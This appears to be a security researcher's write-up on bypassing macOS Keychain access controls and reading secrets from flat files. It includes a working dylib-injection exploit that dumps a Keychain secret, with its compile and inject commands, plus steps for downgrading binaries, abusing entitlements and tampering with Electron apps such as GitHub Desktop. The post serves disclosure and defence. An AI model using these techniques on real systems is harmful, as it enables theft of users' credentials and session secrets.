Storing secrets on macOS is a real challenge, and there are many insecure ways to do it. I have tested many Mac apps during bug bounty assessments and observed that developers tend to place secrets in preferences or even hidden flat files. The problem with that approach is that any non-sandboxed application running with typical permissions can access the confidential data.



For example, Signal on macOS stores a key that encrypts all your messages database in ~/Library/Application Support/Signal/config.json.
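To make the risk concrete, here is a minimal C sketch of what any non-sandboxed process running as the user could do with such a flat file. The function name `read_whole_file` is mine and purely illustrative. It uses nothing but standard C file I/O, which is the point: no exploit or special privilege is involved.

```c
#include <stdio.h>
#include <stdlib.h>

/* Reads a whole file into a newly allocated, NUL-terminated buffer.
 * Returns NULL on failure; the caller frees the result.
 * Only the user's normal file permissions are required. */
char *read_whole_file(const char *path) {
    FILE *fp = fopen(path, "rb");
    if (fp == NULL) {
        return NULL;
    }

    /* Determine the file size so the buffer can be allocated in one go. */
    if (fseek(fp, 0, SEEK_END) != 0) {
        fclose(fp);
        return NULL;
    }
    long size = ftell(fp);
    if (size < 0) {
        fclose(fp);
        return NULL;
    }
    rewind(fp);

    char *buf = malloc((size_t)size + 1);
    if (buf == NULL) {
        fclose(fp);
        return NULL;
    }

    size_t got = fread(buf, 1, (size_t)size, fp);
    fclose(fp);
    buf[got] = '\0';
    return buf;
}
```

Pointing it at the config.json path mentioned above (with `~` expanded, for example via `getenv("HOME")`) would return the file contents, key included, assuming the file is readable with the user's normal permissions.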

macOS Keychain

Apple tells us that “The keychain is the best place to store small secrets, like passwords and cryptographic keys”. The Keychain is a really powerful mechanism that allows developers to define access control lists (ACLs) to restrict access to the entries. Applications can be signed with keychain-group entitlements in order to access secrets shared with other apps. The following Objective-C code will save a confidential value in the Keychain:

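    #include <stdbool.h>
    #include <Security/Security.h>

    // Saves a generic-password item labeled "MySecret" in the Keychain.
    bool saveEntry(void) {
        CFStringRef keyLabel = CFSTR("MySecret");
        CFStringRef secret = CFSTR("<secret data...>");
        // kSecValueData is documented as a CFDataRef, so encode the string as UTF-8 bytes.
        CFDataRef secretData = CFStringCreateExternalRepresentation(NULL, secret, kCFStringEncodingUTF8, 0);

        CFMutableDictionaryRef attrDict = CFDictionaryCreateMutable(NULL, 3, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
        CFDictionaryAddValue(attrDict, kSecClass, kSecClassGenericPassword);
        CFDictionaryAddValue(attrDict, kSecAttrLabel, keyLabel);
        CFDictionaryAddValue(attrDict, kSecValueData, secretData);

        // No result is requested (NULL), so kSecReturnData is not needed here.
        OSStatus res = SecItemAdd(attrDict, NULL);

        CFRelease(attrDict);
        CFRelease(secretData);
        return res == errSecSuccess;
    }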



And when executed, you should see that the entry has been successfully added:

Stealing the entry – technique #1

The first technique is to check whether the application has been signed with the Hardened Runtime or Library Validation flag. Yes, the Keychain doesn’t detect code injection, so if neither flag is set you can run your own code inside the app and read its entries. Simply use the following command:

    $ codesign -d -vv /path/to/the/app
    Executable=/path/to/the/app
    Identifier=KeychainSaver
    Format=Mach-O thin (x86_64)
    CodeDirectory v=20200 size=653 flags=0x0(none) hashes=13+5 location=embedded
    Signature size=4755
    Authority=Apple Development: [REDACTED]
    Authority=Apple Worldwide Developer Relations Certification Authority
    Authority=Apple Root CA
    Signed Time=29 Oct 2020 at 19:40:01
    Info.plist=not bound
    TeamIdentifier=[REDACTED]
    Runtime Version=10.15.6
    Sealed Resources=none
    Internal requirements count=1 size=192
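The flags value on the CodeDirectory line is a bitmask. As a rough illustration of the check I do by eye, the C sketch below tests the bits that matter for dylib injection. The constant values are the ones I know from XNU's cs_blobs.h; the function name is hypothetical. Treat it as a first pass only, since it ignores the __RESTRICT segment and any entitlements.

```c
#include <stdbool.h>
#include <stdint.h>

/* Code-signing flag bits, values as defined in XNU's cs_blobs.h. */
#define CS_RESTRICT    0x00000800u  /* dyld treats the process as restricted */
#define CS_REQUIRE_LV  0x00002000u  /* Library Validation is required */
#define CS_RUNTIME     0x00010000u  /* Hardened Runtime is enabled */

/* Hypothetical helper: returns true when none of the flags that normally
 * get in the way of loading a foreign dylib is set. */
bool flags_allow_dylib_injection(uint32_t cd_flags) {
    const uint32_t blocking = CS_RESTRICT | CS_REQUIRE_LV | CS_RUNTIME;
    return (cd_flags & blocking) == 0;
}
```

For the output above, `flags_allow_dylib_injection(0x0)` is true, while a binary signed with the Hardened Runtime (`0x10000`) would make it return false.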

If the flags are 0x0 and there is no __RESTRICT Mach-O segment (that segment is really rare), you can simply inject a malicious dylib into the app’s main executable. Create an exploit.m file with the following contents:

    #import <Foundation/Foundation.h>
    #import <Security/Security.h>

    // Runs automatically when the dylib is loaded into the target process.
    __attribute__((constructor)) static void pwn(int argc, const char **argv) {
        NSLog(@"[+] Dylib injected");

        CFTypeRef entryRef = NULL;
        CFStringRef keyLabel = CFSTR("MySecret");

        // Query for the generic password labeled "MySecret" and ask for its data.
        CFMutableDictionaryRef attrDict = CFDictionaryCreateMutable(NULL, 3, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
        CFDictionaryAddValue(attrDict, kSecAttrLabel, keyLabel);
        CFDictionaryAddValue(attrDict, kSecClass, kSecClassGenericPassword);
        CFDictionaryAddValue(attrDict, kSecReturnData, kCFBooleanTrue);

        OSStatus res = SecItemCopyMatching(attrDict, &entryRef);
        CFRelease(attrDict);

        if (res == errSecSuccess) {
            // With kSecReturnData set, the result is a CFDataRef.
            NSData *resultData = (__bridge NSData *)entryRef;
            NSString *entry = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding];
            NSLog(@"[+] Secret stolen: %@", entry);
        }

        exit(0);
    }

Compile it:

    $ gcc -dynamiclib exploit.m -o exploit.dylib -framework Foundation -framework Security

And inject:

    $ DYLD_INSERT_LIBRARIES=./exploit.dylib ./KeychainSaver
    2020-10-30 19:33:46.600 KeychainSaver [+] Dylib injected
    2020-10-30 19:33:46.628 KeychainSaver [+] Secret stolen: <secret data...>

Stealing the entry – technique #2

What if the executable has been signed with the Hardened Runtime? The bypass is similar to what I showed you in the XPC exploitation series. Grab an old version of the analyzed binary that was signed without the Hardened Runtime and inject the dylib into it. Keychain will not verify the binary’s version and will give you the secret.

Proposed fix for developers – create a Keychain Access Group and move the secrets there. As the old version of the binary wouldn’t be signed with that keychain group entitlement, it wouldn’t be able to get that secret. See docs.

Stealing the entry – technique #3

Keep in mind that the com.apple.security.cs.disable-library-validation entitlement will allow you to inject a malicious dynamic library even if the Hardened Runtime is set.
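As a small illustration, the sketch below checks whether an entitlements plist grants a given boolean entitlement. It assumes you already have the XML entitlements as a string (for example, as dumped from the signature with codesign's --entitlements option). The function name is hypothetical and the string matching is deliberately naive; a real tool should use a proper plist parser.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: returns true if `plist_xml` contains
 * <key>entitlement</key> immediately followed (ignoring whitespace)
 * by <true/>. Naive text matching, not a real plist parser. */
bool entitlement_is_true(const char *plist_xml, const char *entitlement) {
    char needle[256];
    int n = snprintf(needle, sizeof needle, "<key>%s</key>", entitlement);
    if (n < 0 || (size_t)n >= sizeof needle) {
        return false;  /* entitlement name too long for the buffer */
    }

    const char *p = strstr(plist_xml, needle);
    if (p == NULL) {
        return false;  /* key not present at all */
    }

    /* Skip the key element and any whitespace before the value. */
    p += n;
    while (*p != '\0' && isspace((unsigned char)*p)) {
        p++;
    }
    return strncmp(p, "<true/>", 7) == 0;
}
```

Calling it with `"com.apple.security.cs.disable-library-validation"` tells you whether this technique is worth trying against a binary that otherwise looks hardened.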

Stealing the entry – technique #4

As Jeff Johnson proved in his article, TCC only superficially checks the code signature of the app. The same problem exists in the Keychain. Even if the signature of the whole bundle is invalid, the Keychain only verifies that the main executable has not been tampered with. Let’s take one of the Electron applications installed on your device. I’m pretty sure that you have at least one installed (Microsoft Teams, Signal, Visual Studio Code, Slack, Discord, etc.). As has been proved many times (1, 2), Electron apps cannot store your secrets securely.



This is another example of why this is true… Even if you sign Electron with the Hardened Runtime, the malicious application may change JavaScript files containing the actual code. Let’s take a look at Github Desktop.app. It stores the user’s session secret in the Keychain:

And it is validly signed:

    $ codesign -d --verify -v /Applications/GitHub\ Desktop.app
    /Applications/GitHub Desktop.app: valid on disk
    /Applications/GitHub Desktop.app: satisfies its Designated Requirement

Next, change one of the JS files and verify the signature:

    $ echo "/* test */" >> /Applications/GitHub\ Desktop.app/Contents/Resources/app/ask-pass.js
    $ codesign -d --verify -v /Applications/GitHub\ Desktop.app
    /Applications/GitHub Desktop.app: a sealed resource is missing or invalid
    file modified: /Applications/GitHub Desktop.app/Contents/Resources/app/ask-pass.js



You can see that the signature is broken, but the Github will launch normally and load the secret saved in the Keychain:

To prevent modifications, Electron implemented a mechanism called asar-integrity. It calculates a SHA512 hash of the asar archive and stores it in the Info.plist file. The problem is that it doesn’t stop injection. If the main executable has not been signed with the Hardened Runtime or Kill flag and doesn’t contain restricted entitlements, you can simply modify the asar file, calculate a new checksum and update the Info.plist file. If these flags or entitlements are set, you can always use the ELECTRON_RUN_AS_NODE variable and, again, execute code in the main executable’s context. Either way, you can steal the Keychain entries.
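The ELECTRON_RUN_AS_NODE trick can be sketched in a few lines of C. This is a sketch under assumptions: `run_as_node` is a hypothetical helper, and passing the script with `-e` relies on the binary behaving like the Node.js command line once the variable is set. I have not verified it against every Electron build.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: starts `binary` with ELECTRON_RUN_AS_NODE=1 and
 * passes `script` through Node's -e (eval) option.
 * Returns the child's exit status, 127 if exec failed, or -1 on error. */
int run_as_node(const char *binary, const char *script) {
    pid_t pid = fork();
    if (pid < 0) {
        return -1;
    }

    if (pid == 0) {
        /* Child: set the variable, then replace ourselves with the app's
         * main executable so the script runs in that executable's context. */
        setenv("ELECTRON_RUN_AS_NODE", "1", 1);
        execl(binary, binary, "-e", script, (char *)NULL);
        _exit(127);  /* only reached if exec failed */
    }

    int status = 0;
    if (waitpid(pid, &status, 0) < 0) {
        return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The important detail is that the process making the Keychain request is still the validly signed main executable; only the code it runs has changed.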

Summary

As I showed you in this post, storing secrets securely in the Keychain is really hard to achieve. There are multiple ways to bypass the access control mechanism because the code signature of the requesting executable is only checked superficially.

The biggest problem is with Electron apps, which simply cannot store secrets in the Keychain securely. Keep in mind that any framework that stores the actual code outside of the main executable may be tricked into loading malicious code.

If you know any other cool Keychain bypass techniques, please contact me. I’d be happy to update this post. 😉